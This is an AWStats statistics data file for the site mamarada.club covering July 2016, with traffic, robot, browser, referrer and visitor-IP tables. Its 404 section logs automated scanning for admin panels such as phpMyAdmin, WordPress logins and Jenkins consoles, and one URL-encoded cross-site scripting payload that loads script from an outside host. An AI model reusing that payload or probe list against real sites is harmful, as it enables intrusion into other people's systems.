AWSTATS DATA FILE 7.0 (build 1.971)
# If you remove this file, all statistics for date 201607 will be lost/reset.
# Last config file used to build this data file was /etc/awstats/awstats.mamarada.club.conf.

# Position (offset in bytes) in this file for beginning of each section for
# direct I/O access. If you made changes somewhere in this file, you should
# also remove completely the MAP section (AWStats will rewrite it at next
# update).
BEGIN_MAP 27
POS_GENERAL 1993                
POS_TIME 2652                
POS_VISITOR 20500               
POS_DAY 52737               
POS_DOMAIN 3574                
POS_LOGIN 3807                
POS_ROBOT 3962                
POS_WORMS 4749                
POS_EMAILSENDER 4880                
POS_EMAILRECEIVER 5023                
POS_SESSION 53579               
POS_SIDER 53737               
POS_FILETYPES 5158                
POS_DOWNLOADS 5373                
POS_OS 6021                
POS_BROWSER 6216                
POS_SCREENSIZE 8484                
POS_UNKNOWNREFERER 8558                
POS_UNKNOWNREFERERBROWSER 9290                
POS_ORIGIN 9504                
POS_SEREFERRALS 9648                
POS_PAGEREFS 9830                
POS_SEARCHWORDS 11716               
POS_KEYWORDS 11917               
POS_MISC 2315                
POS_ERRORS 12027               
POS_CLUSTER 3663                
POS_SIDER_404 12181               
END_MAP

# LastLine    = Date of last record processed - Last record line number in last log - Last record offset in last log - Last record signature value
# FirstTime   = Date of first visit for history file
# LastTime    = Date of last visit for history file
# LastUpdate  = Date of last update - Nb of parsed records - Nb of parsed old records - Nb of parsed new records - Nb of parsed corrupted - Nb of parsed dropped
# TotalVisits = Number of visits
# TotalUnique = Number of unique visitors
# MonthHostsKnown   = Number of hosts known
# MonthHostsUnKnown = Number of hosts unknown
BEGIN_GENERAL 8
LastLine 20160801002238 1 0 9826725654548
FirstTime 0
LastTime 20160731234617
LastUpdate 20160801010348 1 0 0 0 0
TotalVisits 261                 
TotalUnique 232                 
MonthHostsKnown 0                   
MonthHostsUnknown 1141                
END_GENERAL

# Misc ID - Pages - Hits - Bandwidth
BEGIN_MISC 10
QuickTimeSupport 0 0 0
JavaEnabled 0 0 0
JavascriptDisabled 0 0 0
PDFSupport 0 0 0
WindowsMediaPlayerSupport 0 0 0
AddToFavourites 0 22 0
RealPlayerSupport 0 0 0
TotalMisc 0 0 0
DirectorSupport 0 0 0
FlashSupport 0 0 0
END_MISC

# Hour - Pages - Hits - Bandwidth - Not viewed Pages - Not viewed Hits - Not viewed Bandwidth
BEGIN_TIME 24
0 11 164 8218534 101 195 65861665
1 9 83 3220579 129 234 2786612
2 11 83 4703961 318 371 1514858
3 11 113 5473640 313 363 1553016
4 12 28 930852 105 137 619998
5 14 66 1446649 109 157 1966607
6 6 31 1410285 110 151 1722934
7 8 83 4338215 125 175 680755
8 24 108 6266568 153 197 2250728
9 9 117 7761193 153 194 1258976
10 21 181 7484100 182 231 8741352
11 12 75 6772007 191 226 4861285
12 33 245 13112594 144 183 1441333
13 15 179 22134864 117 160 3056926
14 10 144 6973391 168 271 3130051
15 19 165 27937923 179 233 1708507
16 4 126 7958434 450 494 2692556
17 22 144 6878351 115 185 1613679
18 14 165 9431750 203 299 2063372
19 13 150 6981917 145 197 2949598
20 10 138 7788606 127 208 2574398
21 9 107 6931705 154 203 13284681
22 65 165 6650552 326 404 2149981
23 27 134 4490492 234 323 9463512
END_TIME

# Domain - Pages - Hits - Bandwidth
# The 10 first Pages must be first (order not required for others)
BEGIN_DOMAIN 1
ip 389 2994 185297162
END_DOMAIN

# Cluster ID - Pages - Hits - Bandwidth
BEGIN_CLUSTER 0
END_CLUSTER

# Login - Pages - Hits - Bandwidth - Last visit
# The 10 first Pages must be first (order not required for others)
BEGIN_LOGIN 0
END_LOGIN

# Robot ID - Hits - Bandwidth - Last visit - Hits on robots.txt
# The 10 first Hits must be first (order not required for others)
BEGIN_ROBOT 18
bot[\s_+:,\.\;\/\\-] 750 16827598 20160731221344 133
yandex 691 20730726 20160731234838 116
googlebot 525 5333916 20160731213628 58
mj12bot 67 75820825 20160714025229 9
no_user_agent 59 835399 20160731055629 1
python 42 746466 20160731160710 0
slurp 39 13185883 20160729110513 10
mediapartners\-google 19 272331 20160726015655 0
phantom 13 240323 20160718225118 0
rambler 11 513223 20160705062000 0
spider 3 17909 20160711134649 2
libwww 2 35546 20160731051834 0
unknown 4 272 20160729170215 4
surveybot 2 35546 20160730093622 0
checker 2 0 20160727060741 2
wget 1 17773 20160705222206 0
netcraft 8 106638 20160719010509 0
crawl 4 46670 20160725090852 1
END_ROBOT

# Worm ID - Hits - Bandwidth - Last visit
# The 5 first Hits must be first (order not required for others)
BEGIN_WORMS 0
END_WORMS

# EMail - Hits - Bandwidth - Last visit
# The 20 first Hits must be first (order not required for others)
BEGIN_EMAILSENDER 0
END_EMAILSENDER

# EMail - Hits - Bandwidth - Last visit
# The 20 first hits must be first (order not required for others)
BEGIN_EMAILRECEIVER 0
END_EMAILRECEIVER

# Files type - Hits - Bandwidth - Bandwidth without compression - Bandwidth after compression
BEGIN_FILETYPES 8
css 120 610718 0 0
png 914 87328988 0 0
7z 6 28893484 0 0
json 4 2880 0 0
html 383 6681649 0 0
jpg 1444 61100320 0 0
js 121 643577 0 0
com 2 35546 0 0
END_FILETYPES

# Downloads - Hits - Bandwidth
BEGIN_DOWNLOADS 18
/robots.txt 335 0 22644
/files/disney-05.7z 3 0 28025538
/files/ezhik.7z 3 0 5360424
/files/ptici_lesov.7z 3 0 21160005
/files/krosh.7z 3 0 2921736
/files/uchim-chitat.7z 2 0 12834260
/files/risovanie.7z 2 0 2063884
/files/disney-06.7z 1 0 8332497
/files/disney-02.7z 1 0 11668574
/files/pdd.7z 1 0 1000340
http://www.baidu.com/robots.txt 1 0 68
/files/dorisuy_raskras.7z 1 0 2274071
/files/Na_kakuju_bukvu_nachinaetsja.7z 1 0 869348
/files/azbuka_djvu.7z 1 0 2959972
/files/cifri-risunki.7z 1 0 783184
/files/disney-03.7z 1 0 6675366
/files/disney-04.7z 1 0 7840316
/files/disney-01.7z 1 0 9057571
END_DOWNLOADS

# OS ID - Hits
BEGIN_OS 14
linuxandroid 546
winlong 41
winxp 292
unix 3
winnt 309
win2000 7
win98 1
linuxubuntu 9
linux 204
winvista 131
win7 1011
macosx 372
winunknown 8
Unknown 60
END_OS

# Browser ID - Hits
BEGIN_BROWSER 123
msie6.0 2
chrome50.0.2661.89 46
firefox33.1 3
firefox44.0 2
chrome34.0.1847.137 4
chrome49.0.2623.110 8
chrome28.0.1500.94 4
chrome39.0.2171.95 26
firefox18.0 3
msie4.01 1
chrome31.0.1650.57 52
chrome38.0.2125.111 1
chrome31.0.1650.63 122
safari9.1.2 3
curl 65
alcatel 4
chrome43.0.2357.121 2
chrome51.0.2704.81 129
msie8.0 42
chrome50.0.2661.94 8
firefox43.0 1
safari6.2.8 1
chrome537.306 1
safari9.1.1 56
chrome50.0.2661.102 42
chrome27.0.1453 77
chrome49.0.2623.91 1
firefox9.0.1 28
chrome27.0.1500.0 1
chrome54.0.2810.2 1
chrome50.0.2661.86 3
chrome50.0.2661.75 1
chrome43.0.2357.92 1
chrome49.0.2623.112 49
netscape 25
chrome54.0.2806.0 3
firefox48.0 1
firefox40.0 2
chrome49.0.2623.105 24
chrome40.0.2214.109 2
firefox21.0 11
lg\- 3
safari6.0 2
firefox29.0 9
chrome44.0.2398.0 1
firefox38.0 5
chrome40.0.2214.114 1
chrome47.0.2526.73 57
firefox12.0 1
firefox45.0 5
firefox47.0 73
chrome51.0.2704.103 390
chrome46.0.2490.80 1
firefox33.0 2
chrome48.0.2564.99 3
mozilla 126
firefox25.0 184
chrome44.0.2403.157 6
chrome26.0.1410.64 3
netscape5.0 3
chrome42.0.2311.135 1
chrome32.0.1700.76 3
firefox14.0.1 10
chrome37.0.0.0 2
chrome46.0.2486.0 3
chrome46.0.2490.86 2
chrome44.0.2403.133 28
safari 65
chrome32.0.1700.2 12
chrome34.0.1847.76 11
chrome52.0.2743.41 1
safari7.0 8
android 58
chrome48.0.2564.116 2
chrome54.0.2813.0 3
chrome32.0.1700.41 2
firefox9.0 1
chrome40.0.2214.117 1
opera9.80 77
firefox31.0 2
chrome46.0.2490.76 5
chrome39.0.0.0 22
chrome33.0.0.0 39
chrome32.0.1700.102 1
chrome47.0.2526.80 4
chrome45.0.2454.93 1
chrome47.0.2526.111 3
chrome17.0.1025.133 2
chrome42.0.2311.109 1
chrome34.0.1847.116 2
chrome51.0.2704.84 3
chrome43.0.2357.93 3
chrome34.0.1847.118 1
safari8.0 16
msie9.0 147
firefox27.0 1
Unknown 5
chrome47.0.2526.83 1
firefox11.0 134
chrome30.0.0.0 117
chrome39.0.2171.93 7
chrome35.0.1916.138 1
chrome49.0.2623.87 6
chrome48.0.2564.95 4
chrome51.0.2704.79 3
firefox46.0 1
chrome52.0.2743.60 4
chrome38.0.2125.102 4
chrome44.0.2403.107 3
nokia 7
chrome52.0.2743.82 24
firefox1.0.7 7
safari9.0 109
chrome45.0.2454.101 4
firefox39.0 2
chrome51.0.2704.106 200
firefox3.6.28 3
msie10.0 63
safari5.1 2
chrome43.0.2357.134 2
chrome53.0.2785.21 3
chrome48.0.2564.106 1
firefox3.5.7 1
END_BROWSER

# Screen size - Hits
BEGIN_SCREENSIZE 0
END_SCREENSIZE

# Unknown referer OS - Last visit date
BEGIN_UNKNOWNREFERER 11
Mozilla 20160719220345
Mozilla/5.0_(compatible;_Dataprovider/6.92;__https://www.dataprovider.com/) 20160719122928
Mozilla/5.0_(compatible;_Dataprovider/6.101;__https://www.dataprovider.com/) 20160729170224
Mozilla/5.0_(compatible;_Google-Site-Verification/1.0) 20160729032125
Mozilla/5.0_(Android;_Mobile;_rv:40.0)_Gecko/40.0_Firefox/40.0 20160722180710
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20160723052842
Mozilla/5.0 20160722000407
Mozilla/5.0_(compatible;_Nmap_Scripting_Engine;_http://nmap.org/book/nse.html) 20160720175000
Mozilla/5.0_zgrab/0.x 20160721041409
InternetExplorer8.0 20160721090923
Scanbot 20160728103326
END_UNKNOWNREFERER

# Unknown referer Browser - Last visit date
BEGIN_UNKNOWNREFERERBROWSER 3
masscan/1.0_(https://github.com/robertdavidgraham/masscan) 20160723052842
InternetExplorer8.0 20160721090923
Scanbot 20160728103326
END_UNKNOWNREFERERBROWSER

# Origin - Pages - Hits 
BEGIN_ORIGIN 6
From0 240 668
From1 2 4
From2 96 574
From3 10 583
From4 41 1165
From5 0 0
END_ORIGIN

# Search engine referers ID - Pages - Hits
BEGIN_SEREFERRALS 3
google 24 351
yandex 72 222
yahoo 0 1
END_SEREFERRALS

# External page referers - Pages - Hits
# The 10 first Pages must be first (order not required for others)
BEGIN_PAGEREFS 30
http://m.vk.com/away.php 5 6
http://5.63.156.66:80 2 2
http://webvisor.com/inpage/click_map 1 1
http://subscribe.ru/group/tolko-deti/11554960/ 1 1
http://5.63.156.66 1 1
http://s.codepen.io/boomerang/5ee7752b3a6ec770f6517ebf9b0706ae1469641743049/index.html 0 3
http://localhost:8000 0 14
https://yandex.by/images/touch/search 0 1
https://yandex.by/images/search 0 15
https://5.63.156.66 0 48
http://starwarssaberfront.github.io/Skillbase/ 0 6
http://s.codepen.io/boomerang/d1f6f04b525e76a08db0369808c485a01468877105513/index.html 0 1
https://s.codepen.io/boomerang/e3b8430e6e519ba67a0074af126f9a6e1468864155219/index.html 0 1
https://yandex.ua/images/search 0 24
https://yandex.ua/images/touch/search 0 2
http://s.codepen.io/saintgeo23/fullpage/jqxVER 0 12
https://s.codepen.io/boomerang/b6c4a809d700efb72153b4753d74f8381469967244280/index.html 0 1
https://s.codepen.io/saintgeo23/fullcpgrid/jqxVER 0 51
http://s.codepen.io/boomerang/8f9d98702304461fc487b9e6f8d4c82c1469805329731/index.html 0 1
http://s.codepen.io/boomerang/0c9e1dbf970f4714e5bed3fc5e64d7df1469697653170/index.html 0 1
https://yandex.ua/images/ 0 1
https://yandex.kz/images/search 0 9
http://s.codepen.io/saintgeo23/fullcpgrid/eZPKwo 0 34
https://yandex.kz/images/touch/search 0 2
http://starwarssaberfront.github.io/Skillbase/styles/sabertoe.css 0 2
http://s.codepen.io/boomerang/1ec56a852168489bea4efc9679abc2441467467592660/index.html 0 1
http://s.codepen.io/boomerang/fcc8e28edb42f4657f13d7a38d5d336b1469034572263/index.html 0 1
http://s.codepen.io/saintgeo23/fullcpgrid/jqxVER 0 339
http://s.codepen.io/boomerang/1d4c8f9cee54ef8896a2c1437570d0891468316249299/index.html 0 1
http://s.codepen.io/boomerang/e8986595dd2be2bf87c3aac0706ac16c1469773090001/index.html 0 1
END_PAGEREFS

# Search keyphrases - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_SEARCHWORDS 1
https+//mamarada.club/useful/how-boy-girl.html 1
END_SEARCHWORDS

# Search keywords - Number of search
# The 10 first number of search must be first (order not required for others)
BEGIN_KEYWORDS 2
https 1
//mamarada.club/useful/how-boy-girl.html 1
END_KEYWORDS

# Errors - Hits - Bandwidth
BEGIN_ERRORS 6
403 224 835216
302 2234 665229
206 2 615726
499 1 0
400 2 611
404 1061 3021728
END_ERRORS

# URL with 404 errors - Hits - Last URL referer
BEGIN_SIDER_404 209
/phpmanager/ 2 http://5.63.156.66/
http://d2.50na50.net/myiphb.php 3 -
/phpMyAdmin-4.2.1-english 6 -
http://b1.50na50.net/myiphb.php 2 -
/admin/config.php 10 -
http://www.virusbook.cn/proxyverifytest/http/2016-07-08-04:24:07/5.63.156.66/8080 1 -
/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php 3 http://5.63.156.66/
/phpMyAdmin-2.6.4-pl1/ 2 http://5.63.156.66/
/phpMyAdmin-4.2.1-all-languages 6 -
/script 9 -
/mysqladmin/ 2 http://5.63.156.66/
/.well-known/apple-app-site-association 16 -
/calendar/install/index.php 1 -
http://www.baidu.com/cache/global/img/gs.gif 8 -
/phpMyAdmin-2.8.0/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.1-pl3/ 2 http://5.63.156.66/
http://www.virusbook.cn/proxyverifytest/http/2016-07-08-16:56:01/5.63.156.66/8080 1 -
/modules/columnadverts/uploadimage.php 1 http://useful-info.space/sites/mamarada/modules/columnadverts/uploadimage.php
http://a2.50na50.net/myipha.php 1 -
/xampp/phpmyadmin 6 -
http://a0.50na50.net/myiphb.php 1 -
/phpMyAdmin-2.7.0-pl1/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.2-pl1/ 2 http://5.63.156.66/
http://www.virusbook.cn/proxyverifytest/http/2016-07-09-00:40:51/5.63.156.66/8080 1 -
/webadmin/ 2 http://5.63.156.66/
/tmp/sfx.php 1 -
/modules/vtemslideshow/uploadimage.php 1 http://useful-info.space/sites/mamarada/modules/vtemslideshow/uploadimage.php
/phpMyAdmin-2.7.0-pl2/ 2 http://5.63.156.66/
http://1212.ip138.com/ic.asp 2 http://ip138.com/
/phpMyAdmin-2.8.0.3/ 2 http://5.63.156.66/
/pma/ 3 http://5.63.156.66/
/msd1.24stable 12 -
http://a2.50na50.net/myiphc.php 10 -
/phpMyAdmin2/ 2 http://5.63.156.66/
/phpMyAdmin-2.5.6-rc1/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.4-pl3/ 2 http://5.63.156.66/
http://d2.50na50.net/myiphc.php 9 -
/phpMyAdmin-2.8.1/ 2 http://5.63.156.66/
/myadmin/ 2 http://5.63.156.66/
http://testp4.pospr.waw.pl/testproxy.php 12 -
/mysql 24 -
/HNAP1/ 13 http://5.63.156.66/
http://a1.50na50.net/myiphc.php 11 -
/phpMyAdmin-2.5.5-pl1/ 2 http://5.63.156.66/
http://c0.50na50.net/myiphb.php 4 -
/phpMyAdmin-2.8.0-rc1/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.4-pl2/ 2 http://5.63.156.66/
/phpMyAdmin/scripts/setup.php 1 -
/phpMyAdmin-2.6.3/ 4 http://5.63.156.66/
/phpMyAdmin-2.8.0.2/ 2 http://5.63.156.66/
/login 6 -
/wp-login.php 12 -
/css/font-awesome.min.css 1 -
/word/wp-login.php 3 -
http://d1.50na50.net/myiphc.php 14 -
/SQLite/main.php 3 http://5.63.156.66/
/phpMyAdmin-2.5.6/ 2 http://5.63.156.66/
/SQlite/main.php 14 -
/cgi-bin/php 6 -
/sqlweb/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.2-rc1/ 4 http://5.63.156.66/
/phpMyAdmin-2.6.0-pl2/ 2 http://5.63.156.66/
/mychild/child-08.html 14 -
/phpMyAdmin-2.6.0-rc1/ 2 http://5.63.156.66/
/Blog/wp-login.php 9 -
/SQLiteManager/main.php 14 -
http://testp3.pospr.waw.pl/testproxy.php 13 -
/pma2005/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.4-pl4/ 2 http://5.63.156.66/
http://50na50.net/myiphc.php 4 -
/SQLite/SQLiteManager-1.2.4/main.php 12 -
/phpMyAdmin-2.6.0/ 2 http://5.63.156.66/
/license.php 1 http://useful-info.space/sites/mamarada/license.php
/mySqlDumper 12 -
/phpMyAdmin-2.6.4/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.0-rc3/ 2 http://5.63.156.66/
/PMA/ 3 http://5.63.156.66/
/sqlitemanager/main.php 15 -
/images/issue-no.jpg 2 -
http://b2.50na50.net/myiphc.php 11 -
/phpMyAdmin 21 -
http://hideface.tk/myipha.php 37 -
/phpMyAdmin-2.2.3/ 2 http://5.63.156.66/
http://c0.50na50.net/myiphc.php 8 -
/article-1.html 1 -
/phpMyAdmin-2.6.0-pl1/ 2 http://5.63.156.66/
/admin/common/graph_pie.php 1 -
/php-myadmin/ 2 http://5.63.156.66/
/phpMyAdmin-2.5.5-rc1/ 2 http://5.63.156.66/
http://naemnick.net/azenv.php 4 -
/phpMyAdmin-2.8.1-rc1/ 2 http://5.63.156.66/
http://c2.50na50.net/myiphb.php 6 -
/phpmyadmin 22 -
/phpMyAdmin-2.8.0-beta1/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.1-rc1/ 2 http://5.63.156.66/
/jenkins/script 6 -
http://static.90.170.46.78.clients.your-server.de/myipha.php 1 -
/phpMyAdmin-2.6.0-rc2/ 2 http://5.63.156.66/
/phpMyAdmin-2.5.4/ 2 http://5.63.156.66/
/msd1.24.4 12 -
/jmx-console 12 -
/18ba41dc-3432-49f7-b81f-f6e0d56820f9 1 -
/main.php 3 http://5.63.156.66/
/modules/simpleslideshow/uploadimage.php 1 http://useful-info.space/sites/mamarada/modules/simpleslideshow/uploadimage.php
/wp-articles/wp-login.php 2 http://useful-info.space/sites/mamarada/wp-articles/wp-login.php
/%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fu.xss.ht%3E%3C%2Fscript%3E 1 %22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fu.xss.ht%3E%3C%2Fscript%3E
/phpMyAdmin-2.6.1/ 2 http://5.63.156.66/
/PMA2005/ 2 http://5.63.156.66/
/phpMyAdmin-2.5.6-rc2/ 2 http://5.63.156.66/
/wordpress/wp-login.php 9 -
/MySQLDumper 12 -
/phpMyAdmin-2.6.0-alpha2/ 2 http://5.63.156.66/
/webadmin 6 -
http://a0.50na50.net/myiphc.php 9 -
/cms/administrator 6 -
/phpMyAdmin-2.6.3-pl1/ 2 http://5.63.156.66/
/phpmy-admin/ 2 http://5.63.156.66/
http://c2.50na50.net/myiphc.php 10 -
/joomla/administrator 6 -
/admin/i18n/readme.txt 1 -
/phpMyAdmin-2.6.0-alpha/ 2 http://5.63.156.66/
http://d1.50na50.net/myipha.php 1 -
/phpmyadmin/ 3 http://5.63.156.66/
/mysqlmanager/ 2 http://5.63.156.66/
/mysql/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.1-pl2/ 2 http://5.63.156.66/
/sql 24 -
/websql/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.0-beta2/ 2 http://5.63.156.66/
/phpMyAdmin-2.7.0-beta1/ 2 http://5.63.156.66/
/webdav 6 -
http://a2.50na50.net/myiphb.php 5 -
/phpmyadmin2/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.0-beta1/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.2/ 2 http://5.63.156.66/
http://b0.50na50.net/myiphc.php 10 -
/wp-admin//wp-login.php 3 -
/phpMyAdmin-2.5.7-pl1/ 2 http://5.63.156.66/
http://static.90.170.46.78.clients.your-server.de/myiphc.php 1 -
http://b0.50na50.net/myiphb.php 3 -
/myadmin/scripts/setup.php 1 -
/administrator 6 -
/blog/wp-login.php 9 -
http://testp1.piwo.pila.pl/testproxy.php 14 -
/phpMyAdmin-2.6.1-rc2/ 2 http://5.63.156.66/
/phpMyAdmin-2/ 2 http://5.63.156.66/
/msd 12 -
/typo3/phpmyadmin 6 -
http://impuls.name/pgpro/getheaders1.php 5 -
/admin/ 3 http://5.63.156.66/
http://static.90.170.46.78.clients.your-server.de/myiphd.php 5 -
http://c1.50na50.net/myiphb.php 2 -
http://b1.50na50.net/myiphc.php 17 -
/etc/lib/pChart2/examples/index.php 2 -
/php-my-admin/ 2 http://5.63.156.66/
/phpMyAdmin-2.8.0.1/ 2 http://5.63.156.66/
/.well-known/assetlinks.json 18 -
http://d1.50na50.net/myiphb.php 4 -
http://www.virusbook.cn/proxyverifytest/2016-07-06-05:54:08/5.63.156.66/8080 1 -
/cgi-bin/php5 6 -
/phpMyAdmin-2.6.1-pl1/ 2 http://5.63.156.66/
/phpMyAdmin-2.5.7/ 2 http://5.63.156.66/
http://www.google.com/reader/about/ 5 -
/phpMyAdmin-2.5.5-rc2/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.0-pl3/ 2 http://5.63.156.66/
/phpMyAdmin-2.2.6/ 2 http://5.63.156.66/
/SQLiteManager-1.2.4/main.php 15 -
/phpMyAdmin-2.7.0-rc1/ 2 http://5.63.156.66/
/phpMyAdmin-2.8.0-rc2/ 2 http://5.63.156.66/
http://www.virusbook.cn/proxyverifytest/2016-07-03-04:40:22/5.63.156.66/8080 1 -
/myadmin 12 -
http://d0.50na50.net/myiphc.php 15 -
/webdb/ 2 http://5.63.156.66/
/phpMyAdmin-2.8.0.4/ 2 http://5.63.156.66/
/modules/up.php 1 http://useful-info.space/sites/mamarada/modules/up.php
/404 1 -
/wp/wp-login.php 9 -
http://c1.50na50.net/myiphd.php 1 -
/phpMyAdmin-2.5.1/ 2 http://5.63.156.66/
/phpMyAdmin-2.6.4-rc1/ 2 http://5.63.156.66/
/Wordpress/wp-login.php 9 -
/mysqldumper 12 -
/command.php 1 -
/openserver/phpmyadmin/ 2 http://5.63.156.66/
/status 6 -
http://b2.50na50.net/myiphb.php 6 -
/phpMyAdmin-2.6.2-beta1/ 2 http://5.63.156.66/
/sqlmanager/ 2 http://5.63.156.66/
/Joomla/administrator 6 -
http://a1.50na50.net/myiphb.php 4 -
/hudson/script 3 http://5.63.156.66/
/phpMyAdmin-2.6.3-rc1/ 2 http://5.63.156.66/
/p/m/a/ 2 http://5.63.156.66/
/pma/scripts/setup.php 1 -
/agSearch/SQlite/main.php 3 http://5.63.156.66/
/manager/html 13 -
http://37.48.94.6/proxychecker/check.cgi 1 http://www.google.com/search
/webcalendar/install/index.php 1 -
http://180.163.113.77/check_proxy 1 -
/sqlite/main.php 15 -
/phpMyAdmin/ 3 http://5.63.156.66/
/phpMyAdmin-2.7.0/ 2 http://5.63.156.66/
/mysql-admin/ 2 http://5.63.156.66/
/apple-app-site-association 18 -
/phpMyAdmin-2.5.5/ 2 http://5.63.156.66/
http://c1.50na50.net/myiphc.php 14 -
/phpMyAdmin-2.8.2/ 2 http://5.63.156.66/
/dbadmin/ 3 http://5.63.156.66/
http://d0.50na50.net/myiphb.php 4 -
END_SIDER_404

# Host - Pages - Hits - Bandwidth - Last visit date - [Start date of last visit] - [Last page of last visit]
# [Start date of last visit] and [Last page of last visit] are saved only if session is not finished
# The 10 first Hits must be first (order not required for others)
BEGIN_VISITOR 1141
64.79.100.17 50 50 869790 20160719220345
192.99.150.97 12 12 219771 20160719122929
167.114.172.225 12 12 219771 20160729170225
69.58.178.57 10 10 190549 20160711080050
176.126.15.9 9 97 16852929 20160730130445
123.59.59.52 8 8 142184 20160727113111
217.160.178.232 5 5 88865 20160724154235
109.229.69.81 4 4 71092 20160716072447
81.133.194.48 4 4 71092 20160731234617
115.249.74.13 4 4 71092 20160730092825
79.139.226.15 0 1 24018 
37.151.224.7 0 1 186984 
90.143.155.42 0 1 20995 
95.84.156.220 0 1 121097 
185.42.96.239 0 1 24018 
109.106.142.83 0 1 34174 
5.1.3.24 1 1 30387 20160709110918
141.212.122.145 1 1 17773 20160715103616
89.33.211.183 1 1 21604 20160701103706
181.143.226.82 2 2 35546 20160722180640
46.42.128.159 0 1 2656 
5.143.25.112 0 2 202187 
37.110.210.171 0 4 253582 
92.47.246.57 0 1 22151 
97.126.121.152 0 3 26484 
95.72.153.0 0 1 121097 
120.132.50.135 1 1 17773 20160715053533
217.69.133.169 1 1 17773 20160727044628
46.201.208.122 0 1 19680 
176.77.87.161 1 1 11056 20160707100647
118.200.215.152 0 3 26484 
85.140.2.47 0 2 40736 
217.19.208.109 0 1 26782 
189.16.6.126 0 1 8486 
212.57.187.198 0 1 260381 
176.59.149.122 0 1 186984 
46.42.235.142 0 1 115170 
46.151.64.198 1 1 17773 20160704231113
176.193.192.138 1 1 17773 20160713193228
185.13.112.183 2 11 417455 20160712084631
46.73.199.78 1 13 240323 20160724103236
80.220.207.149 0 1 19680 
31.135.245.237 0 2 214733 
78.154.160.206 0 1 260381 
5.43.146.241 0 1 25936 
93.75.217.128 0 1 27784 
87.114.211.13 0 3 26484 
46.73.176.213 0 1 19680 
66.249.82.231 0 1 31736 
193.169.125.14 0 1 342543 
89.139.57.41 0 1 158647 
176.77.64.227 1 1 17773 20160731052255
92.49.245.185 0 1 19680 
91.246.113.187 0 3 26484 
31.173.87.47 0 1 39840 
178.207.51.223 0 1 130315 
37.235.151.192 0 1 31736 
177.184.232.6 1 1 17773 20160708111834
66.102.8.245 0 4 90901 
176.100.122.98 0 1 39840 
178.93.148.250 0 2 46462 
176.62.69.98 0 1 273079 
90.143.161.155 0 1 39840 
88.206.4.93 0 1 342543 
217.5.156.186 0 3 26484 
94.138.181.211 0 21 54495 
85.173.121.240 0 1 31736 
46.255.68.54 0 1 19741 
178.90.253.216 0 2 55754 
178.215.106.53 0 1 31736 
185.3.32.18 0 1 32532 
176.15.62.114 0 1 329 
81.102.199.172 0 3 26484 
75.39.107.154 0 3 26484 
178.206.197.0 0 1 113576 
66.102.8.240 1 5 91179 20160701172113
94.50.192.182 1 6 35141 20160707123553
91.236.204.71 2 2 35546 20160721031522
66.102.6.214 0 11 211579 
109.63.224.85 1 1 17773 20160720121920
46.138.27.166 0 1 147505 
131.108.245.147 1 1 17773 20160701073905
93.20.246.132 0 3 26484 
185.68.153.4 0 1 20995 
37.146.212.118 1 1 17773 20160720023455
188.255.27.50 1 17 402478 20160719122458
128.68.0.78 0 1 228 
178.210.129.17 0 4 28011 
37.44.101.74 0 1 113576 
95.133.238.196 0 1 108817 
217.160.179.87 3 3 53319 20160717203251
5.166.123.228 0 1 273079 
178.90.227.21 0 3 26484 
77.45.215.155 0 1 158647 
95.221.211.101 0 1 228 
176.14.142.243 0 1 39840 
95.24.38.144 1 6 374049 20160706155230
77.222.106.75 0 1 342543 
212.231.69.229 2 2 35546 20160711042828
95.153.129.136 0 1 342543 
176.77.98.72 1 13 240323 20160702000656
188.255.20.61 1 8 187887 20160719031811
46.188.72.70 1 17 402478 20160714193911
95.73.162.109 0 1 131969 
92.246.174.242 1 19 278979 20160730002456
109.191.27.11 0 1 7773 
188.230.27.241 0 1 55460 
2.94.160.75 0 1 70789 
90.143.174.208 0 1 145096 
188.233.44.22 0 1 39840 
217.107.192.142 0 1 121578 
194.135.45.183 0 1 342543 
5.141.9.80 0 1 55460 
78.137.6.40 0 1 13808 
194.44.123.86 0 1 342543 
95.83.108.213 1 13 240323 20160716212819
109.252.44.200 0 1 239041 
46.73.125.176 0 1 2656 
188.186.73.144 0 1 12206 
5.251.42.245 0 1 38411 
78.85.212.186 0 1 121097 
118.163.83.109 0 3 26484 
5.44.174.135 0 1 70789 
46.98.37.103 0 1 7773 
91.124.210.109 0 1 82267 
198.20.70.114 1 1 17773 20160725074030
31.180.140.140 0 1 27784 
80.95.39.88 1 15 260027 20160729144714
93.171.118.140 0 1 239041 
37.212.98.52 0 1 273079 
178.46.82.12 0 1 39840 
46.45.1.239 0 1 55460 
85.26.164.238 0 1 76479 
58.233.240.146 0 3 26484 
176.51.99.3 0 1 342543 
78.29.87.102 0 2 264265 
217.118.81.27 0 1 7773 
202.86.219.70 0 3 26484 
66.249.92.100 1 1 53 20160714151925
217.118.78.124 0 1 24637 
176.195.167.33 1 5 33826 20160707201009
37.212.161.95 0 1 239041 
95.28.13.20 0 1 121578 
37.21.238.31 0 1 273079 
85.26.164.231 0 1 18736 
85.140.2.193 0 1 20995 
213.111.148.30 0 1 121097 
2.93.41.160 0 1 186984 
87.117.16.215 0 1 273079 
37.230.228.67 0 1 76479 
109.104.171.100 1 1 17773 20160708113847
217.118.93.146 0 1 186984 
178.74.105.218 0 1 342543 
211.22.61.91 0 3 26484 
31.23.126.224 0 1 113576 
37.192.36.148 0 1 158647 
189.28.157.209 0 3 26484 
189.121.222.214 0 3 26484 
94.100.210.65 0 1 7773 
176.214.193.119 0 1 323923 
80.252.253.218 0 1 145096 
87.237.233.18 0 2 179752 
109.196.73.184 0 1 20995 
213.87.163.166 0 1 28325 
54.146.93.230 1 1 17773 20160706130010
178.140.155.6 2 14 266236 20160731050440
62.105.142.254 0 1 43628 
83.239.166.219 0 1 273079 
46.32.123.61 0 1 20995 
95.108.225.226 0 1 342543 
5.166.250.148 0 4 28011 
